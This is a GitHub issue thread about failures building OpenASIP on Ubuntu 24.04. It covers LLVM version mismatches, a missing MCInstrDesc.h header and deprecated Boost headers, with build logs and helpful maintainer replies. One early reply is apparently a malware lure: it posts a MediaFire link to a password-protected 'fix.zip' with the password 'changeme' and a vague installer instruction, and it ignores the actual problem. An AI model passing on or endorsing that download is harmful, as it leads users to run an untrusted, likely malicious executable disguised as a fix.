cpc/openasip #268: Problem in installing OpenASIP tools

Jedrek09, 2024-08-27:
Hello . I hope this message finds you well.  There are certain issues I wanted to talk about while installing OpenASIP Tools.

I installed C++ and python and made sure pywin32 was installed correctly. Then I installed virtual box and downloaded the linux iso file. Then I finally created the virtual machine. 
 However, I encountered challenges while installing the OpenASIP tools. After ensuring approximately 44 GB of space on my machine, I followed the instructions closely. Unfortunately, I discovered that the script for installing LLVM 15 was missing from the repository which I required, with scripts only available for LLVM versions 14, 16, and 17. I attempted a manual installation of LLVM 15 but encountered an error in the CMakeLists file.  Consequently, I proceeded with the installation of LLVM 16, as it is an updated version of LLVM 15 containing all of its features, which was successful, and I implemented the code

The primary obstacle arose where I encountered errors related to deprecated Boost headers (progress.hpp and timer.hpp) and deprecated C++ functionality. To address these issues, I defined BOOST_TIMER_ENABLE_DEPRECATED in the build environment and made efforts to refactor the code to remove deprecated C++ features.  I resolved these by manually replacing deprecated headers with their modern equivalents and installing missing C++ headers that were not available by default on my system.

Unfortunately, I then encountered another issue where the compiler was unable to locate the MCInstrDesc.h header file from the LLVM project. I resolved this by manually identifying the correct path within the LLVM build and including it in the installation process. While this addressed the immediate problem, the Boost header issues reappeared.

Could you please provide any solution for that.

miniMuggle, 2024-08-27:
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

karihepola, 2024-08-27:
Hi,

The current main/release only supports LLVM 16 and 17, which is most likely the reason you encountered errors if you tried compiling the current release/main of OpenASIP with LLVM 15. If you absolutely must use LLVM 15, you have to roll back to an older release (openasip-2.0 branch). It's difficult to say without further investigation how these LLVM erros came to be later on when you switched to LLVM 16, but it could be the result of first trying to compile OpenASIP with an unsupported LLVM version.

As for the boost errors, which boost version are you using? Also, which operating system?

Jedrek09, 2024-08-27:
I installed LLVM 16 by following the commands that were provided ad was successful in running it. I made sure there were no residual of llvm 15 or any other version. 

When running the final step that it (./autogen.sh && ./configure --prefix=$HOME/local && make -j8 && make install) I encountered the issue (OperationPoolPimpl.cc:60:10: fatal error: llvm/MC/MCInstrDesc.h: No such file or directory
   60 | #include <llvm/MC/MCInstrDesc.h>
      |          ^~~~~~~~~~~~~~~~~~~~~~~
compilation terminated.
make[4]: *** [Makefile:575: OperationPoolPimpl.lo] Error 1
make[4]: *** Waiting for unfinished jobs....
mv -f .deps/OperationSerializer.Tpo .deps/OperationSerializer.Plo
mv -f .deps/OperationGlobals.Tpo .deps/OperationGlobals.Plo
mv -f .deps/OperationIndex.Tpo .deps/OperationIndex.Plo
mv -f .deps/OperationDAGBehavior.Tpo .deps/OperationDAGBehavior.Plo
mv -f .deps/OperationDAGBuilder.Tpo .deps/OperationDAGBuilder.Plo
mv -f .deps/OperationDAG.Tpo .deps/OperationDAG.Plo
mv -f .deps/OperationDAGConverter.Tpo .deps/OperationDAGConverter.Plo
make[4]: Leaving directory '/home/salman/openasip-devel/openasip/src/base/osal'
make[3]: *** [Makefile:467: all-recursive] Error 1
make[3]: Leaving directory '/home/salman/openasip-devel/openasip/src/base'
make[2]: *** [Makefile:575: all-recursive] Error 1
make[2]: Leaving directory '/home/salman/openasip-devel/openasip/src'
make[1]: *** [Makefile:567: all-recursive] Error 1
make[1]: Leaving directory '/home/salman/openasip-devel/openasip'
make: *** [Makefile:441: all] Error 2)

I again tried with ./autogen.sh && ./configure --prefix=$HOME/local && make -j1 && make install, and still got the same issue 

After running (dpkg-query -l | grep libboost)

I got the following
(ii  libboost-all-dev                              1.83.0.1ubuntu2                          amd64        Boost C++ Libraries development files (ALL) (default version)
ii  libboost-atomic-dev:amd64                     1.83.0.1ubuntu2                          amd64        atomic data types, operations, and memory ordering constraints (default version)
ii  libboost-atomic1.83-dev:amd64                 1.83.0-2.1ubuntu3                        amd64        atomic data types, operations, and memory ordering constraints
ii  libboost-atomic1.83.0:amd64                   1.83.0-2.1ubuntu3                        amd64        atomic data types, operations, and memory ordering constraints
ii  libboost-chrono-dev:amd64                     1.83.0.1ubuntu2                          amd64        C++ representation of time duration, time point, and clocks (default version)
ii  libboost-chrono1.83-dev:amd64                 1.83.0-2.1ubuntu3                        amd64        C++ representation of time duration, time point, and clocks
ii  libboost-chrono1.83.0t64:amd64                1.83.0-2.1ubuntu3                        amd64        C++ representation of time duration, time point, and clocks
ii  libboost-container-dev:amd64                  1.83.0.1ubuntu2                          amd64        C++ library that implements several well-known containers - dev files (default version)
ii  libboost-container1.83-dev:amd64              1.83.0-2.1ubuntu3                        amd64        C++ library that implements several well-known containers - dev files
ii  libboost-container1.83.0:amd64                1.83.0-2.1ubuntu3                        amd64        C++ library that implements several well-known containers
ii  libboost-context-dev:amd64                    1.83.0.1ubuntu2                          amd64        provides a sort of cooperative multitasking on a single thread (default version)
ii  libboost-context1.83-dev:amd64                1.83.0-2.1ubuntu3                        amd64        provides a sort of cooperative multitasking on a single thread
ii  libboost-context1.83.0:amd64                  1.83.0-2.1ubuntu3                        amd64        provides a sort of cooperative multitasking on a single thread
ii  libboost-coroutine-dev:amd64                  1.83.0.1ubuntu2                          amd64        provides a sort of cooperative multitasking on a single thread (default version)
ii  libboost-coroutine1.83-dev:amd64              1.83.0-2.1ubuntu3                        amd64        provides a sort of cooperative multitasking on a single thread
ii  libboost-coroutine1.83.0:amd64                1.83.0-2.1ubuntu3                        amd64        provides a sort of cooperative multitasking on a single thread
ii  libboost-date-time-dev:amd64                  1.83.0.1ubuntu2                          amd64        set of date-time libraries based on generic programming concepts (default version)
ii  libboost-date-time1.83-dev:amd64              1.83.0-2.1ubuntu3                        amd64        set of date-time libraries based on generic programming concepts
ii  libboost-date-time1.83.0:amd64                1.83.0-2.1ubuntu3                        amd64        set of date-time libraries based on generic programming concepts
ii  libboost-dev:amd64                            1.83.0.1ubuntu2                          amd64        Boost C++ Libraries development files (default version)
ii  libboost-exception-dev:amd64                  1.83.0.1ubuntu2                          amd64        library to help write exceptions and handlers (default version)
ii  libboost-exception1.83-dev:amd64              1.83.0-2.1ubuntu3                        amd64        library to help write exceptions and handlers
[... cut ...]
ii  libboost-wave1.83-dev:amd64                   1.83.0-2.1ubuntu3                        amd64        C99/C++ preprocessor library
ii  libboost-wave1.83.0:amd64                     1.83.0-2.1ubuntu3                        amd64        C99/C++ preprocessor library
ii  libboost1.83-dev:amd64                        1.83.0-2.1ubuntu3                        amd64        Boost C++ Libraries development files
ii  libboost1.83-tools-dev                        1.83.0-2.1ubuntu3                        amd64        Boost C++ Libraries development tools)

My Operating system is Ubuntu 24.04 LTS

pjaaskel, 2024-08-28:
Right. You can try installing an older (tested) boost version. Or alternatively fix any possible incompatibilities the new boost has with the OpenASIP code base. I wouldn't recommend poking the headers in the system by hand, but always install from the pacakges. For the LLVM, it seems your LLVM installation is still somehow broken as it doesn't find the headers. My immediate guess is that your Ubuntu has an LLVM installed in the system which TCE-patched LLVM installed from the script somehow conflicts with (tries to include from its paths perhaps). Or your TCE-patched LLVM is not installed in a path where cpp finds it by default (llvmtce-config should point to it).